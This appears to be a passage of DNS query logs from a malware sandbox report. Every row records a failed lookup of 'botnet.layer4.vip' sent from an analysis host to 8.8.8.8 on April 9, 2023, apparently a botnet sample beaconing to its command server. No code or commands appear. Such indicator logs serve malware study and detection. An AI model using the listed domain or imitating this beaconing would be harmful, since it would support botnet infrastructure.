                                  Apr 9, 2023 03:30:44.120023012 CEST8.8.8.8192.168.2.230x82d4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.135497093 CEST8.8.8.8192.168.2.230x82d4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.150954962 CEST8.8.8.8192.168.2.230x82d4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.166666031 CEST8.8.8.8192.168.2.230x82d4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.182502031 CEST8.8.8.8192.168.2.230x82d4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.198049068 CEST8.8.8.8192.168.2.230x686dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.222115040 CEST8.8.8.8192.168.2.230x686dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.246243954 CEST8.8.8.8192.168.2.230x686dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.270536900 CEST8.8.8.8192.168.2.230x686dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.294804096 CEST8.8.8.8192.168.2.230x686dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.319418907 CEST8.8.8.8192.168.2.230xaebaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.334990025 CEST8.8.8.8192.168.2.230xaebaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.359508991 CEST8.8.8.8192.168.2.230xaebaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.383709908 CEST8.8.8.8192.168.2.230xaebaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.399270058 CEST8.8.8.8192.168.2.230xaebaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.423794031 CEST8.8.8.8192.168.2.230xfa65Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.448147058 CEST8.8.8.8192.168.2.230xfa65Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.472613096 CEST8.8.8.8192.168.2.230xfa65Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.488240004 CEST8.8.8.8192.168.2.230xfa65Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.512304068 CEST8.8.8.8192.168.2.230xfa65Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.528377056 CEST8.8.8.8192.168.2.230x58ebName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.544275045 CEST8.8.8.8192.168.2.230x58ebName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.560327053 CEST8.8.8.8192.168.2.230x58ebName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.584517002 CEST8.8.8.8192.168.2.230x58ebName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.600644112 CEST8.8.8.8192.168.2.230x58ebName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.625065088 CEST8.8.8.8192.168.2.230x6804Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.649172068 CEST8.8.8.8192.168.2.230x6804Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.673316956 CEST8.8.8.8192.168.2.230x6804Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.689297915 CEST8.8.8.8192.168.2.230x6804Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.713598967 CEST8.8.8.8192.168.2.230x6804Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.730066061 CEST8.8.8.8192.168.2.230xa6b9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.745893002 CEST8.8.8.8192.168.2.230xa6b9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.770304918 CEST8.8.8.8192.168.2.230xa6b9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.786186934 CEST8.8.8.8192.168.2.230xa6b9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.802084923 CEST8.8.8.8192.168.2.230xa6b9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.818059921 CEST8.8.8.8192.168.2.230xc426Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.842515945 CEST8.8.8.8192.168.2.230xc426Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.858381987 CEST8.8.8.8192.168.2.230xc426Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.873960972 CEST8.8.8.8192.168.2.230xc426Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.898324013 CEST8.8.8.8192.168.2.230xc426Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.922755957 CEST8.8.8.8192.168.2.230xcee1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.946734905 CEST8.8.8.8192.168.2.230xcee1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.970638037 CEST8.8.8.8192.168.2.230xcee1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.986471891 CEST8.8.8.8192.168.2.230xcee1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.010462999 CEST8.8.8.8192.168.2.230xcee1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.034897089 CEST8.8.8.8192.168.2.230xc59bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.059379101 CEST8.8.8.8192.168.2.230xc59bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.075057983 CEST8.8.8.8192.168.2.230xc59bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.090596914 CEST8.8.8.8192.168.2.230xc59bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.114973068 CEST8.8.8.8192.168.2.230xc59bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.139472961 CEST8.8.8.8192.168.2.230x932fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.154928923 CEST8.8.8.8192.168.2.230x932fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.178993940 CEST8.8.8.8192.168.2.230x932fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.194966078 CEST8.8.8.8192.168.2.230x932fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.221158981 CEST8.8.8.8192.168.2.230x932fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.236774921 CEST8.8.8.8192.168.2.230x67c5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.260771990 CEST8.8.8.8192.168.2.230x67c5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.276474953 CEST8.8.8.8192.168.2.230x67c5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.291976929 CEST8.8.8.8192.168.2.230x67c5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.316931009 CEST8.8.8.8192.168.2.230x67c5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.341098070 CEST8.8.8.8192.168.2.230x7d3eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.365473986 CEST8.8.8.8192.168.2.230x7d3eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.381031036 CEST8.8.8.8192.168.2.230x7d3eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.396545887 CEST8.8.8.8192.168.2.230x7d3eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.420653105 CEST8.8.8.8192.168.2.230x7d3eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.436676979 CEST8.8.8.8192.168.2.230xbf01Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.461098909 CEST8.8.8.8192.168.2.230xbf01Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.476572990 CEST8.8.8.8192.168.2.230xbf01Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.492050886 CEST8.8.8.8192.168.2.230xbf01Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.507858038 CEST8.8.8.8192.168.2.230xbf01Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.532267094 CEST8.8.8.8192.168.2.230xbf21Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.556571960 CEST8.8.8.8192.168.2.230xbf21Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.572060108 CEST8.8.8.8192.168.2.230xbf21Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.588207960 CEST8.8.8.8192.168.2.230xbf21Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.612260103 CEST8.8.8.8192.168.2.230xbf21Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.636794090 CEST8.8.8.8192.168.2.230x8175Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.652326107 CEST8.8.8.8192.168.2.230x8175Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.677303076 CEST8.8.8.8192.168.2.230x8175Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.703155041 CEST8.8.8.8192.168.2.230x8175Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.736345053 CEST8.8.8.8192.168.2.230x8175Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.761539936 CEST8.8.8.8192.168.2.230x8c61Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.780571938 CEST8.8.8.8192.168.2.230x8c61Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.809209108 CEST8.8.8.8192.168.2.230x8c61Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.834351063 CEST8.8.8.8192.168.2.230x8c61Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.860845089 CEST8.8.8.8192.168.2.230x8c61Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.877656937 CEST8.8.8.8192.168.2.230xe26bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.901803017 CEST8.8.8.8192.168.2.230xe26bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.925954103 CEST8.8.8.8192.168.2.230xe26bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.941905975 CEST8.8.8.8192.168.2.230xe26bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.957427979 CEST8.8.8.8192.168.2.230xe26bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.973170042 CEST8.8.8.8192.168.2.230x53Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.997183084 CEST8.8.8.8192.168.2.230x53Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.022089958 CEST8.8.8.8192.168.2.230x53Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.038003922 CEST8.8.8.8192.168.2.230x53Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.053884983 CEST8.8.8.8192.168.2.230x53Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.069914103 CEST8.8.8.8192.168.2.230xb462Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.085855961 CEST8.8.8.8192.168.2.230xb462Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.102099895 CEST8.8.8.8192.168.2.230xb462Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.117763996 CEST8.8.8.8192.168.2.230xb462Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.142287970 CEST8.8.8.8192.168.2.230xb462Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.166673899 CEST8.8.8.8192.168.2.230xae34Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.190902948 CEST8.8.8.8192.168.2.230xae34Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.207741976 CEST8.8.8.8192.168.2.230xae34Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.232153893 CEST8.8.8.8192.168.2.230xae34Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.248162031 CEST8.8.8.8192.168.2.230xae34Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.264317036 CEST8.8.8.8192.168.2.230x34cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.289839983 CEST8.8.8.8192.168.2.230x34cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.313946009 CEST8.8.8.8192.168.2.230x34cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.338160038 CEST8.8.8.8192.168.2.230x34cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.354104042 CEST8.8.8.8192.168.2.230x34cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.378254890 CEST8.8.8.8192.168.2.230x69aeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.393758059 CEST8.8.8.8192.168.2.230x69aeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.409634113 CEST8.8.8.8192.168.2.230x69aeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.425060987 CEST8.8.8.8192.168.2.230x69aeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.449498892 CEST8.8.8.8192.168.2.230x69aeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.473937988 CEST8.8.8.8192.168.2.230x5f93Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.497987986 CEST8.8.8.8192.168.2.230x5f93Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.522512913 CEST8.8.8.8192.168.2.230x5f93Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.538249016 CEST8.8.8.8192.168.2.230x5f93Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.562575102 CEST8.8.8.8192.168.2.230x5f93Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.578437090 CEST8.8.8.8192.168.2.230x6258Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.602529049 CEST8.8.8.8192.168.2.230x6258Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.618443966 CEST8.8.8.8192.168.2.230x6258Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.642636061 CEST8.8.8.8192.168.2.230x6258Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.658476114 CEST8.8.8.8192.168.2.230x6258Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.683041096 CEST8.8.8.8192.168.2.230x90cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.707608938 CEST8.8.8.8192.168.2.230x90cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.723701000 CEST8.8.8.8192.168.2.230x90cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.748193026 CEST8.8.8.8192.168.2.230x90cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.763814926 CEST8.8.8.8192.168.2.230x90cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.788444042 CEST8.8.8.8192.168.2.230xc048Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.812947989 CEST8.8.8.8192.168.2.230xc048Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.837275028 CEST8.8.8.8192.168.2.230xc048Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.861861944 CEST8.8.8.8192.168.2.230xc048Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.886388063 CEST8.8.8.8192.168.2.230xc048Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.902375937 CEST8.8.8.8192.168.2.230xb13fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.918461084 CEST8.8.8.8192.168.2.230xb13fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.934243917 CEST8.8.8.8192.168.2.230xb13fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.950359106 CEST8.8.8.8192.168.2.230xb13fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.974667072 CEST8.8.8.8192.168.2.230xb13fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.990612030 CEST8.8.8.8192.168.2.230xe5faName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.015197992 CEST8.8.8.8192.168.2.230xe5faName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.039839029 CEST8.8.8.8192.168.2.230xe5faName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.055583000 CEST8.8.8.8192.168.2.230xe5faName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.080465078 CEST8.8.8.8192.168.2.230xe5faName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.104882956 CEST8.8.8.8192.168.2.230x6386Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.129350901 CEST8.8.8.8192.168.2.230x6386Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.153822899 CEST8.8.8.8192.168.2.230x6386Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.169862032 CEST8.8.8.8192.168.2.230x6386Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.185544014 CEST8.8.8.8192.168.2.230x6386Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.201229095 CEST8.8.8.8192.168.2.230xb39cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.217219114 CEST8.8.8.8192.168.2.230xb39cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.233911037 CEST8.8.8.8192.168.2.230xb39cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.259275913 CEST8.8.8.8192.168.2.230xb39cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.274811983 CEST8.8.8.8192.168.2.230xb39cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.290502071 CEST8.8.8.8192.168.2.230xccb3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.306150913 CEST8.8.8.8192.168.2.230xccb3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.330624104 CEST8.8.8.8192.168.2.230xccb3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.346587896 CEST8.8.8.8192.168.2.230xccb3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.362154007 CEST8.8.8.8192.168.2.230xccb3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.378161907 CEST8.8.8.8192.168.2.230x61e5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.394100904 CEST8.8.8.8192.168.2.230x61e5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.418781996 CEST8.8.8.8192.168.2.230x61e5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.443142891 CEST8.8.8.8192.168.2.230x61e5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.459265947 CEST8.8.8.8192.168.2.230x61e5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.483720064 CEST8.8.8.8192.168.2.230x3ae8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.507961988 CEST8.8.8.8192.168.2.230x3ae8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.532495022 CEST8.8.8.8192.168.2.230x3ae8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.556945086 CEST8.8.8.8192.168.2.230x3ae8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.573513031 CEST8.8.8.8192.168.2.230x3ae8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.589520931 CEST8.8.8.8192.168.2.230x2c5eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.613641024 CEST8.8.8.8192.168.2.230x2c5eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.630544901 CEST8.8.8.8192.168.2.230x2c5eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.646142960 CEST8.8.8.8192.168.2.230x2c5eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.662091970 CEST8.8.8.8192.168.2.230x2c5eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.678428888 CEST8.8.8.8192.168.2.230xc29cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.694565058 CEST8.8.8.8192.168.2.230xc29cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.718815088 CEST8.8.8.8192.168.2.230xc29cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.743451118 CEST8.8.8.8192.168.2.230xc29cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.767878056 CEST8.8.8.8192.168.2.230xc29cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.792267084 CEST8.8.8.8192.168.2.230xc84Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.808187962 CEST8.8.8.8192.168.2.230xc84Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.832705975 CEST8.8.8.8192.168.2.230xc84Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.848637104 CEST8.8.8.8192.168.2.230xc84Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.873100042 CEST8.8.8.8192.168.2.230xc84Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.888838053 CEST8.8.8.8192.168.2.230x8128Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
